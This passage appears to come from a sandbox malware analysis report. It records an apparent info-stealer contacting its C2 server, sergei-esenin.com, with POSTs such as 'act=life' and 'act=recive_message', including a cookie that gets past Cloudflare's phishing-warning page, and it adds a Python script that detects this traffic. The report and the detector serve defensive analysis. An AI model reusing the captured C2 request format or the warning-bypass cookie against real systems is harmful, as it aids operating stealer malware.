2024-10-13 04:54:08 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-13 04:54:09 UTC | 16384 | IN | Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-13 04:54:09 UTC | 3768 | IN | Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-13 04:54:09 UTC | 171 | IN | Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
Data Ascii: <span>View mobile website</span></div></div></div></div><!-- responsive_page_content --></div><!-- responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.21.53.8 | 443 | 7140 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 04:54:09 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sergei-esenin.com
2024-10-13 04:54:09 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 04:54:09 UTC | 553 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 04:54:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i65Q868U7Enr8cfo2eCei%2BtScT5TX3nW%2FcKTWUb5cLeXkCCFVrHLnFJiEAylCw8Zo87uYH3h1VBRA1hX3gX6kUWMByeHvGHvqu04Fd79SLuRMUGqbRmPpoujKwclLB%2FwHxhlmw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1cbae69b584304-EWR
2024-10-13 04:54:09 UTC | 816 | IN | Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
Data Ascii: 1151<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if
2024-10-13 04:54:09 UTC | 1369 | IN | Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style><!--[if gte IE 10]><!--><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-10-13 04:54:09 UTC | 1369 | IN | Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
2024-10-13 04:54:09 UTC | 887 | IN | Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
2024-10-13 04:54:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 104.21.53.8 | 443 | 7140 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 04:54:10 UTC | 354 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=hBo.L319DdN_T0PJa7tYvjmaL4kOlNqAcP2mUK4xBAM-1728795249-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: sergei-esenin.com
2024-10-13 04:54:10 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-13 04:54:10 UTC | 831 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 04:54:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ik8sruja7304d8ee3hst3j0cfa; expires=Wed, 05 Feb 2025 22:40:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJt4YgWbyGfNav2hfhipdclX%2BAhBRPzvmQ%2Ftc3UFYZRvufcgsZqaTuvC1xQeNLQ5%2Ff8f0qhd0iyGnUsHRL%2B37hXCKHjDz82nQaac2qpXAWUJhB9k77y6x28hXXPDnpy%2BSE8MEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1cbaeb6b0d4207-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 04:54:10 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 04:54:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
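The three sessions above are the whole C2 conversation in this run: a GET for a Steam profile, a POST to /api with act=life that is answered with Cloudflare's phishing-warning page (the /cdn-cgi/phish-bypass form) rather than a C2 reply, and a second POST that presents the __cf_mw_byp cookie, carries act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j= and gets back "error #D12". The following is an added example, not part of the Joe Sandbox report, that classifies raw HTTP requests of that shape. The three requests are constructed from the request lines, headers and bodies captured above; the classification labels, the Steam-ID pattern, and the rule that treats the __cf_mw_byp cookie as evidence the client stepped past the warning page are this example's assumptions, not a published LummaC specification.

```python
"""
Classify captured HTTP requests against the C2 traffic shape seen in the
report: a Steam profile fetch, then form-encoded POSTs to /api whose `act`
field is "life" (liveness check) or "recive_message" (task request).

Added example, not part of the Joe Sandbox report. Labels and rules are
this example's assumptions.
"""
import re
from typing import Optional
from urllib.parse import parse_qs

UA_CHROME119 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

# Constructed from the report's sessions 0, 1 and 2.
SAMPLE_REQUESTS = [
    "GET /profiles/76561199724331900 HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    f"User-Agent: {UA_CHROME119}\r\n"
    "Host: steamcommunity.com\r\n"
    "\r\n",
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {UA_CHROME119}\r\n"
    "Content-Length: 8\r\n"
    "Host: sergei-esenin.com\r\n"
    "\r\n"
    "act=life",
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: __cf_mw_byp=hBo.L319DdN_T0PJa7tYvjmaL4kOlNqAcP2mUK4xBAM-1728795249-0.0.1.1-/api\r\n"
    f"User-Agent: {UA_CHROME119}\r\n"
    "Content-Length: 52\r\n"
    "Host: sergei-esenin.com\r\n"
    "\r\n"
    "act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=",
]


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify(req: dict) -> Optional[dict]:
    """Return a finding for requests matching the observed C2 shape, else None."""
    h = req["headers"]
    host = h.get("host", "")
    # A 17-digit Steam64 profile fetch; in the report it immediately precedes the first C2 POST.
    if req["method"] == "GET" and host == "steamcommunity.com" \
            and re.fullmatch(r"/profiles/\d{17}", req["path"]):
        return {"kind": "steam_profile_fetch", "host": host, "path": req["path"]}
    if req["method"] == "POST" and req["path"] == "/api" \
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(req["body"], keep_blank_values=True).items()}
        act = form.get("act")
        if act == "life":
            kind = "c2_liveness"
        elif act == "recive_message":      # the misspelling is part of the signature
            kind = "c2_task_request"
        else:
            return None
        return {
            "kind": kind,
            "host": host,
            "ver": form.get("ver"),
            "lid": form.get("lid"),
            # Cookie the client presented after its first POST got Cloudflare's
            # phishing-warning page (the /cdn-cgi/phish-bypass form) instead of a C2 reply.
            "bypassed_cf_warning": "__cf_mw_byp=" in h.get("cookie", ""),
        }
    return None


def scan(requests) -> list:
    """Classify a list of raw requests, dropping the ones that match nothing."""
    return [f for f in (classify(parse_request(r)) for r in requests) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The "act=" vocabulary and the bare Chrome/119 User-Agent with no Accept or Accept-Language headers are what make these POSTs stand out from browser traffic to the same host; the bypass cookie is the extra signal that the client was not a person reading a warning page but a program retrying with whatever the page handed it.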


Target ID: 0
Start time: 00:54:05
Start date: 13/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x780000
File size: 1'808'384 bytes
MD5 hash: 34124E70E2508DE56D89B57345B39F65
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 00:54:09
Start date: 13/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896
Imagebase: 0xc30000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                  No disassembly